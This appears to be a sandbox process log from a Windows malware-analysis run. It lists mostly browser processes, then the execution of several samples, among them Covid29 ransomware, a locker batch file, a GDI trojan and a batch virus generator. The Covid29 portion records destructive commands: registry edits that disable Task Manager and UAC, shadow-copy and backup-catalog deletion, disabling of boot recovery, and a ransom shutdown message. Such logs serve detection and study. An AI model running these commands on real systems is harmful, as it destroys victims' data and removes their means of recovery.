"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6524 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7332 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5404 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6064 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1716 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\kozalocker-englishversion (GoatLocker).bat" "
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7D12.tmp\TrojanRansomCovid29.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7D12.tmp\fakeerror.vbs"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe
Cov29Cry.exe
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 9
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29LockScreen.exe
Cov29LockScreen.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6216 /prefetch:8
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7044 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8
C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe
"C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe"
C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe
"C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3336 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6720 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:8
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a8 0x4a4
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4572 -ip 4572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 1080
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe"
C:\Windows\SysWOW64\appidtel.exe
"C:\Windows\System32\appidtel.exe"
C:\Windows\SysWOW64\ARP.EXE
"C:\Windows\System32\ARP.EXE"
C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\System32\AtBroker.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\System32\attrib.exe"
C:\Windows\SysWOW64\auditpol.exe
"C:\Windows\System32\auditpol.exe"
C:\Windows\SysWOW64\autochk.exe
"C:\Windows\System32\autochk.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\System32\autoconv.exe"
C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\System32\autofmt.exe"
C:\Windows\SysWOW64\backgroundTaskHost.exe
"C:\Windows\System32\backgroundTaskHost.exe"
